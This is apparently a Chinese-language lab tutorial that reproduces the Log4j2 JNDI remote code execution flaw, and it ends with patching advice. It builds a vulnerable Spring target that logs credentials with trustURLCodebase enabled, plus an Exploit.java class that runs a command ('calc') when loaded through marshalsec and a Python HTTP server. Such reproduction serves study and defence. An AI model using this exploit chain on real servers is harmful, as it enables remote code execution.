目录
1 Apache Log4j1.1 log4j的简介1.2 log4j的漏洞危害1.3 影响范围
2 漏洞环境搭建2.1 工具2.2 靶机搭建
2.3 漏洞利用2.3.1 构建POC代码2.3.2 测试
3 修复建议4 [原文链接](https://mp.weixin.qq.com/s/cWD46F0yyCy3F0u9SjBnEg)
1 Apache Log4j
1.1 log4j的简介
Log4j是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。被广泛地应用在中间件、开发框架与Web应用中。
1.2 log4j的漏洞危害
该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
1.3 影响范围
Apache Log4j 2.x <= 2.15.0-rc1
2 漏洞环境搭建
2.1 工具
靶机服务器编写软件:idea Jdk版本:jdk1.8.0_144 服务器:Tomcat 工具包:marshalsec-0.0.3-SNAPSHOT-all.jar 其他需要使用的工具:Python3、postman
2.2 靶机搭建
新建Spring Web项目
完成初始化页面。
部署log4j的core和api依赖到pom.xml。maven仓库(Maven Repository)
新建HelloController类,并编写hello和login接口。 Hello接口用于直面观察“当开启Tomcat服务器的时候,是否运行正常“、 关键代码:
@RestController
public class HelloController {
private Logger logger = LogManager.getLogger(HelloController.class);
@RequestMapping("/hello")
public String hello() {
return "hello";
}
@RequestMapping(value = "/login", method = {RequestMethod.POST})
public String login(@RequestBody Map body) {
String username = body.get("username").toString();
String password = body.get("password").toString();
logger.error("username:{}, password:{}", username, password);
return "login";
}
}
编辑VM选项 “-Dcom.sun.jndi.ldap.object.trustURLCodebase=true“。 OK,完成靶机代码搭建。 开启服务器端口号9999监听
2.3 漏洞利用
2.3.1 构建POC代码
新建项目,新建java类,编写Exploit.java
import java.io.IOException;
public class Exploit {
public Exploit() {
try {
String cmds = "calc";
Runtime.getRuntime().exec(cmds);
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
Exploit exploit = new Exploit();
}
}
打开cmd命令行,编译生成Exploit.class文件
javac Exploit.java
使用Python3开启http服务(用于传送病毒文件)
2.3.2 测试
开启运行靶机服务器 网页查看 证明正常运行靶机服务器
打开postman,新建Request,发送POST请求 即可看到弹出“计算机“。
3 修复建议
目前,Apache官方已发布新版本完成漏洞修复,建议用户尽快进行自查,并及时升级至最新版本: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
建议同时采用如下临时措施进行漏洞防范: (1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true; (2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true; (3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本; (4)部署使用第三方防火墙产品进行安全防护。
4 原文链接
本文用途只做学术交流,攥写不易,如果有用,老铁们点个赞。
相关阅读
发表评论